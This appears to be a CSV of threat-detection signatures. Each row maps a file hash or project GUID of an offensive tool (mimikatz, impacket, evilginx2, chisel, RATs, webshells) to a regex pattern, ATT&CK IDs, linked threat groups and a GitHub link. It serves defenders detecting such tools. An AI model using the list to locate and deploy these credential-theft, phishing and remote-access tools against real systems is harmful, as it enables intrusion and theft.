"*9e3a20cef67c034ac59b4793a8aa34cbdc7e130fe0ae791fe74059ba4ba0983d*",".{0,1000}9e3a20cef67c034ac59b4793a8aa34cbdc7e130fe0ae791fe74059ba4ba0983d.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","#filehash","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","31985"
"*9e3c27168bdaa45fe127ba530d5f5bfbec067088fe92d02b78342a0e66dba5c0*",".{0,1000}9e3c27168bdaa45fe127ba530d5f5bfbec067088fe92d02b78342a0e66dba5c0.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","31988"
"*9e415352dda775398d02d9dd203367ce365c562da6227f72b77fb2916550345f*",".{0,1000}9e415352dda775398d02d9dd203367ce365c562da6227f72b77fb2916550345f.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","31989"
"*9e485ad4912ef50847e09de786a67ecbfddc97f0bd6b731ff15f9c03975114c9*",".{0,1000}9e485ad4912ef50847e09de786a67ecbfddc97f0bd6b731ff15f9c03975114c9.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","31990"
"*9e49c482faf12eaefc62f5724c083e35de138b15d2c593db2398577ebd6fdf33*",".{0,1000}9e49c482faf12eaefc62f5724c083e35de138b15d2c593db2398577ebd6fdf33.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31991"
"*9e49c482faf12eaefc62f5724c083e35de138b15d2c593db2398577ebd6fdf33*",".{0,1000}9e49c482faf12eaefc62f5724c083e35de138b15d2c593db2398577ebd6fdf33.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31992"
"*9e53f4d6daccf2c7f5f8acbe56160e6f7301f3bdd05e067cb2be6c7f17e0c482*",".{0,1000}9e53f4d6daccf2c7f5f8acbe56160e6f7301f3bdd05e067cb2be6c7f17e0c482.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","31995"
"*9E5A6F99-0A26-4959-847D-A4221CF4441B*",".{0,1000}9E5A6F99\-0A26\-4959\-847D\-A4221CF4441B.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","31997"
"*9e5f035ccefdbc02663184279025d1d84e2823a0340f6e027b55670987f0a42c*",".{0,1000}9e5f035ccefdbc02663184279025d1d84e2823a0340f6e027b55670987f0a42c.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in  to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#filehash","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","31998"
"*9e6659ea06490dde8a0815c3df51dfa242e6f9f0dd8f5a3ba3e7e4cdc2e77630*",".{0,1000}9e6659ea06490dde8a0815c3df51dfa242e6f9f0dd8f5a3ba3e7e4cdc2e77630.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","#filehash","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","31999"
"*9e67ec011613b7a41c197b89e1affac2f3d421a91e89e64f0f4ba195dfffb3db*",".{0,1000}9e67ec011613b7a41c197b89e1affac2f3d421a91e89e64f0f4ba195dfffb3db.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32001"
"*9e6d326e015aaf3634835f5f7da3579ff477c5b93ea43d349b819925e83a7537*",".{0,1000}9e6d326e015aaf3634835f5f7da3579ff477c5b93ea43d349b819925e83a7537.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32003"
"*9E6E4B36B39C50C733FE8EB2DD43AB1A6B397066866A1D16987D87275B0359D3*",".{0,1000}9E6E4B36B39C50C733FE8EB2DD43AB1A6B397066866A1D16987D87275B0359D3.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","32004"
"*9e83b2e2efe2a751a735f413dee7582e8ba8a0639b8d092cf165b87b166639c2*",".{0,1000}9e83b2e2efe2a751a735f413dee7582e8ba8a0639b8d092cf165b87b166639c2.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","32007"
"*9e85c971331b8ad686c8d79ea81c4883d3f36a7de2071551fe5369fcf34ea3d0*",".{0,1000}9e85c971331b8ad686c8d79ea81c4883d3f36a7de2071551fe5369fcf34ea3d0.{0,1000}","offensive_tool_keyword","impacketremoteshell","install a legit application and interface with it over smb w/o the signature of cmd.exe / powershell.exe being called or the redirection typically used by those techniques","T1077 - T1059.007 - T1569.001","TA0008 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","32008"
"*9e8a97e342f21509bdba9c4abfdefafe5b3a4fc60c046415ad397eca356e5d04*",".{0,1000}9e8a97e342f21509bdba9c4abfdefafe5b3a4fc60c046415ad397eca356e5d04.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","32009"
"*9e9aaf77f76851a8d1da734637ed245260ad503de82fa4c886a070e29fdd3ee3*",".{0,1000}9e9aaf77f76851a8d1da734637ed245260ad503de82fa4c886a070e29fdd3ee3.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","32011"
"*9E9BB94C-1FBE-4D0B-83B7-E42C83FC5D45*",".{0,1000}9E9BB94C\-1FBE\-4D0B\-83B7\-E42C83FC5D45.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","#GUIDproject","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","32012"
"*9ea5eacc218210713b56a5b131e254114322f3cadb41fb074cfe02d07f5e8e03*",".{0,1000}9ea5eacc218210713b56a5b131e254114322f3cadb41fb074cfe02d07f5e8e03.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32013"
"*9ea66594805d5e7b8a1abc876f99d7ce1de87936902a3f7726f5f0188778c874*",".{0,1000}9ea66594805d5e7b8a1abc876f99d7ce1de87936902a3f7726f5f0188778c874.{0,1000}","offensive_tool_keyword","ChaiLdr","Indirect syscalls AV bypass","T1055.011 - T1569 - T1564 - T1213","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Cipher7/ChaiLdr","1","0","#filehash","N/A","9","3","220","35","2024-05-17T13:58:04Z","2024-03-29T09:19:10Z","32014"
"*9ea746441ab9d38f81e10c8688f8420a15127684c68cdf82ab87cf1e98cca47e*",".{0,1000}9ea746441ab9d38f81e10c8688f8420a15127684c68cdf82ab87cf1e98cca47e.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","32015"
"*9ea9995496c329267d7bfba8f2061b6df43d5db255bc103b14730042e782e5cf*",".{0,1000}9ea9995496c329267d7bfba8f2061b6df43d5db255bc103b14730042e782e5cf.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","32016"
"*9eafa0b3e8005c6b03cb5d2522140021c573b5efd042fcc057a4ff75794c28ea*",".{0,1000}9eafa0b3e8005c6b03cb5d2522140021c573b5efd042fcc057a4ff75794c28ea.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","32017"
"*9eb0701865866d14eb8a85cb2801de1963400fac29467be8e4c253212955d06d*",".{0,1000}9eb0701865866d14eb8a85cb2801de1963400fac29467be8e4c253212955d06d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32018"
"*9eb21ba1323fac7c64c1e03fb3c29e374ab7d99ab9c4d27eb4c3166575769a0f*",".{0,1000}9eb21ba1323fac7c64c1e03fb3c29e374ab7d99ab9c4d27eb4c3166575769a0f.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#filehash","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","32019"
"*9eb720213fd4b7e283384dd03306b7a4a632234ff743f9812169d0e22efb24ed*",".{0,1000}9eb720213fd4b7e283384dd03306b7a4a632234ff743f9812169d0e22efb24ed.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","32021"
"*9eb78bef9bba6135087de0c8307c2f893eef9a4a2d1f8c37de643f059ce2f711*",".{0,1000}9eb78bef9bba6135087de0c8307c2f893eef9a4a2d1f8c37de643f059ce2f711.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","#filehash","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","32022"
"*9EB8DC3B-60DC-451E-8C18-3D7E38D463FD*",".{0,1000}9EB8DC3B\-60DC\-451E\-8C18\-3D7E38D463FD.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","32023"
"*9ebd06f50a0d1e1cd7b6d00a2bda96120af6284799a1400894e4898a9a59e13f*",".{0,1000}9ebd06f50a0d1e1cd7b6d00a2bda96120af6284799a1400894e4898a9a59e13f.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32024"
"*9ec223a7538868ec25a3823217038beedef36d8dd1f8e388c056bf79fd864b93*",".{0,1000}9ec223a7538868ec25a3823217038beedef36d8dd1f8e388c056bf79fd864b93.{0,1000}","offensive_tool_keyword","SharpBruteForceSSH","simple SSH brute force tool ","T1110.003 - T1078","TA0006 ","N/A","N/A","Credential Access","https://github.com/HernanRodriguez1/SharpBruteForceSSH","1","0","#filehash","N/A","9","1","60","10","2024-04-28T17:56:33Z","2024-04-25T20:06:05Z","32025"
"*9ec78bce4a3ae1586e4bddd8e8becde6f7277b3a63205e3043a175e996c96175*",".{0,1000}9ec78bce4a3ae1586e4bddd8e8becde6f7277b3a63205e3043a175e996c96175.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32026"
"*9ECA7D150BA4BF6458ECA88EC6083DDEE2113202C68D07F6E7BC521333D0CE10*",".{0,1000}9ECA7D150BA4BF6458ECA88EC6083DDEE2113202C68D07F6E7BC521333D0CE10.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","32028"
"*9ecca3b6c787675d74bbfaa0e3ded77d448a0de4fe51c3c29c07cf3b04b8b71d*",".{0,1000}9ecca3b6c787675d74bbfaa0e3ded77d448a0de4fe51c3c29c07cf3b04b8b71d.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","#filehash","N/A","10","2","179","36","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z","32030"
"*9ed6afef63c00c3c4d2eb6003922a872f0125639201fdf2f04ce3ab3b991d2be*",".{0,1000}9ed6afef63c00c3c4d2eb6003922a872f0125639201fdf2f04ce3ab3b991d2be.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","32031"
"*9EDF1E70CDCE89E9AE400305C24CD202EC348D38E464F61180D509C5AF569CB3*",".{0,1000}9EDF1E70CDCE89E9AE400305C24CD202EC348D38E464F61180D509C5AF569CB3.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","32033"
"*9EE27D63-6AC9-4037-860B-44E91BAE7F0D*",".{0,1000}9EE27D63\-6AC9\-4037\-860B\-44E91BAE7F0D.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","0","#GUIDproject","N/A","10","4","349","67","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z","32035"
"*9ee370e295cb26ad1b06650144941dc380888d48e0c1ae446cdae7e00e055e82*",".{0,1000}9ee370e295cb26ad1b06650144941dc380888d48e0c1ae446cdae7e00e055e82.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","32036"
"*9ef20604a95558331dc4bed09434f69c6b18f2916ed27245fe77742aafaa2e77*",".{0,1000}9ef20604a95558331dc4bed09434f69c6b18f2916ed27245fe77742aafaa2e77.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","32037"
"*9ef4e3284e5ffe762b6e18d341a1a9e3400e5cd76241d6ef0af77103119c3515*",".{0,1000}9ef4e3284e5ffe762b6e18d341a1a9e3400e5cd76241d6ef0af77103119c3515.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","32038"
"*9ef956d02a750d02229c4e150795d0d5b6c603b9af7b6bc4bb24f9c9dc21a630*",".{0,1000}9ef956d02a750d02229c4e150795d0d5b6c603b9af7b6bc4bb24f9c9dc21a630.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32040"
"*9efacd75bddef7424cbce62a44bb6f94e7015af799301f19da01c6ea72fb2481*",".{0,1000}9efacd75bddef7424cbce62a44bb6f94e7015af799301f19da01c6ea72fb2481.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32041"
"*9EFFFF7A-DC03-4D52-BB8F-F0140FAD26E7*",".{0,1000}9EFFFF7A\-DC03\-4D52\-BB8F\-F0140FAD26E7.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","32043"
"*9emin1/charlotte*",".{0,1000}9emin1\/charlotte.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","N/A","10","10","976","211","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z","32044"
"*9f0a2fc2267823c55250c5036b3555e8e707ac274252a8c9fd18e521c8e66287*",".{0,1000}9f0a2fc2267823c55250c5036b3555e8e707ac274252a8c9fd18e521c8e66287.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32045"
"*9f10e67d819156bec13f1a307df49dcf21bd91ddff45205818e402899e58ccca*",".{0,1000}9f10e67d819156bec13f1a307df49dcf21bd91ddff45205818e402899e58ccca.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","#filehash","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","32046"
